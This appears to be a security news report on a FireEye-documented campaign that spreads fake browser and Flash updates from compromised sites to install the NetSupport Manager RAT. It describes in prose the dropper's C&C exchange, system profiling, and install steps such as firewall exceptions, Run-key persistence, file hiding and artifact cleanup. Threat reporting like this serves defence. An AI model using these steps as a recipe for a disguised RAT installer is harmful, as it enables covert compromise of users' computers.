FireEye security experts have found that hackers are leveraging compromised websites to distribute fake updates for popular software used to deliver NetSupport Manager RAT.
NetSupport is an off-the-shelf RAT which system admins could use for remote administration of computers. Cyber criminals used to abuse this legitimate application to deploy malware on users’ PCs.
Recently, the security experts at FireEye have registered a hacking campaign which has been active for the past few months and has been leveraging compromised websites to spread fake updates for popular software (i.e. Adobe Flash, Chrome, and FireFox) that were also used to deliver the NetSupport Manager remote access tool (RAT).
As soon as the users have executed the updates, a malicious JavaScript file is downloaded, usually from a Dropbox link.
“Over the last few months, FireEye has tracked an in-the-wild campaign that leverages compromised sites to spread fake updates. In some cases, the payload was the NetSupport Manager remote access tool (RAT).” the FireEye analysis states.
“The operator behind these campaigns uses compromised sites to spread fake updates masquerading as Adobe Flash, Chrome, and FireFox updates.”
The JavaScript file collects information on the target computer and sends it to the server. In turn, the server sends additional commands and executes a JavaScript to deliver the final payload. The JavaScript which delivers the final payload is called Update.js, and it is executed from %AppData% with the help of wscript.exe.
“Since the malware uses the caller and callee function code to derive the key, if the analyst adds or removes anything from the first or second layer script, the script will not be able to retrieve the key and will terminate with an exception.” the analysis reads.
Being executed, the JavaScript contacts the command and control (C&C) server and sends a value named ‘tid’ and the current date of the system in an encoded format. Then the server provides a response which the script decodes after that and executes it as a function called step2.
The step2 function gathers and encodes various system information and sends it to the server after that: computer name, user name, architecture, processors, OS, domain, BIOS version, manufacturer, model, anti-spyware product, anti-virus product, MAC address, keyboard, pointing device, display controller configuration, and process list.
Then, the server responds with a function called step3 and Update.js, which is the script to downloads and executes the final payload.
The Javascript uses PowerShell commands to download multiple files from the server, including:
- 7za.exe: 7zip standalone executable
- LogList.rtf: Password-protected archive file
- Upd.cmd: Batch script to install the NetSupport Client
- Downloads.txt: List of IPs (possibly the infected systems)
- Get.php: Downloads LogList.rtf
The tasks performed by the script are:
1. Extract the archive using the 7zip executable with the password mentioned in the script.
2. After extraction, delete the downloaded archive file (loglist.rtf).
3. Disable Windows Error Reporting and App Compatibility.
4. Add the remote control client executable to the firewall’s allowed program list.
5. Run remote control tool (client32.exe).
6. Add Run registry entry with the name “ManifestStore” or downloads shortcut file to Startup folder.
7. Hide the files using attributes.
8. Delete all the artifacts (7zip executable, script, archive file).
Hackers use the NetSupport Manager to gain remote access to the compromised systems and control it.
The final JavaScript downloaded a list of IP addresses which could be compromised systems, most of them in the U.S., Germany, and the Netherlands.
